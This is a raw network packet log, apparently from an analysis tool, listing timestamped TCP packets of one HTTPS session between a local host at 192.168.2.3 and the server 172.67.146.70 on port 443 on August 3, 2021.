Aug 3, 2021 23:38:08.084815979 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.084855080 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.084872961 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.084882021 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.084933043 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.085463047 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.085500002 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.085539103 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.085558891 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.085872889 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.085911989 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.085941076 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.085958958 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.085999966 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.086009026 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.086677074 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.086764097 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.349737883 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.349766016 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.349787951 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.349807978 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.349914074 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.350162029 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.350191116 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.350200891 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.350213051 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.350233078 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.350291014 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.350956917 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.350984097 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.351006985 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.351027012 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.351047039 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.351074934 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.351752043 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.351773024 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.351793051 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.351811886 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.351849079 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.351871967 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.352544069 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.352566004 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.352585077 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.352601051 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.352658987 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.353358984 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.353380919 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.353400946 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.353420019 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.353461027 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.353502035 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.354130030 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.354151011 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.354175091 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.354197025 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.354227066 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.354259014 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.354942083 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.354962111 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.354985952 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.355050087 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.601033926 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.601087093 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.601125002 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.601161957 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.601190090 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.601253986 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.601325035 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.602205038 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.602248907 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.602286100 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.602313042 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.602317095 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.602387905 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.602426052 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.602520943 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.603163958 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.603204966 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.603251934 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.603274107 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.603293896 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.603353977 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.603560925 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.604839087 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.604876041 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.604913950 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.604931116 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.604952097 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.604959965 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.605149031 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.605232954 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.606698990 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.606731892 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.606770992 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.606818914 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.606837034 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.606861115 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.606874943 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.606888056 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.606945992 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.609563112 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.609612942 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.609654903 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.609673977 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.609692097 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.609744072 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.609960079 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.610004902 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.610040903 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.610060930 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.610086918 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.610136986 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.610754967 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.610793114 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.610826969 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.610846996 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.611274004 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.611315966 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.611340046 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.611341953 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.611392021 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.862565994 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.862603903 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.862627983 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.862644911 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.862809896 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.863897085 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.863943100 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.863957882 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.864053965 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.865259886 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.865284920 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.865305901 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.865340948 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.865346909 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.865405083 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.865430117 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.865526915 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.869330883 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.869359970 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.869380951 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.869400978 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.869441032 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.869473934 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.869710922 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.869735956 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.869759083 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.869779110 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.869838953 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.869872093 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.870527029 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.870554924 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.870573997 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.870594978 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.870660067 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.870690107 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.871324062 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.871344090 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.871475935 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.871701002 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.871723890 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.871742010 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.871757984 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.871808052 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.871851921 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.872474909 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.875828028 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.875844002 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.875854015 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.875864983 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.875962019 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.876271963 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.876286983 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.876295090 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:08.876354933 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:08.876460075 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.124524117 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.124596119 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.124639988 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.124671936 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.124741077 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.124789953 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.125791073 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.125833988 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.125863075 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.125915051 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.126689911 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.126724005 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.126802921 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.126843929 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.126882076 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.126905918 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.126951933 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.126981020 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.126987934 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.127438068 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.127518892 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.128565073 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.128607035 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.128643990 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.128670931 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.128690958 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.128751040 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.128922939 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.137710094 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.137761116 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.137803078 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.137840033 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.137871027 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.137917995 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.138048887 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.138087034 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.138112068 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.138124943 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.138163090 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.138175011 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.138885975 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.138935089 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.138966084 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.138974905 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.139013052 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.139027119 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.139681101 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.139722109 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.139759064 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.139766932 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.139796972 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.139823914 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.140469074 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.140507936 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.140558004 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.140568972 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.140623093 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.140625000 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.141269922 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.141313076 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.141350031 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.186348915 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.386466980 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.386547089 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.386586905 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.386627913 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.386709929 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.386753082 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.387027979 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.387072086 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.387100935 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.387161016 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.388252974 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.388290882 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.388341904 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.388348103 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.388401031 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.388410091 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.388675928 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.388756037 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.389803886 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.389852047 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.389894009 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.389919996 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.389950037 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.390007973 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.390227079 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.391453028 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.391494036 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.391520977 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.391547918 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.391587973 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.391635895 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.391675949 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.391704082 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.391746998 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.396120071 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.396161079 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.396198988 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.396214008 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.396260023 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.396262884 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.396471977 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.396513939 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.396538973 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.396569014 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.396619081 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.396625996 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.397239923 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.397279024 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.397317886 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.397336006 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.397376060 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.397382975 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.398098946 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.398148060 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.398210049 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.398228884 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.398305893 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.398664951 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.398734093 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.398792028 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.398850918 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.398878098 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.398921967 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.399461031 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.452012062 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.660976887 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.661037922 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.661109924 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.661144972 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.661189079 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.661261082 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.661339998 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.661406040 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.661442995 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.661449909 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.661479950 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.661556005 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.662000895 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.662045002 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.662081957 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.662096024 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.662118912 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.662164927 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.662781000 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.662823915 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.662863016 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.662887096 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.662904978 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.662952900 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.663608074 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.663649082 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.663685083 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.663703918 CEST	49708	443	192.168.2.3	172.67.146.70
Aug 3, 2021 23:38:09.663723946 CEST	443	49708	172.67.146.70	192.168.2.3
Aug 3, 2021 23:38:09.663778067 CEST	49708	443	192.168.2.3	172.67.146.70
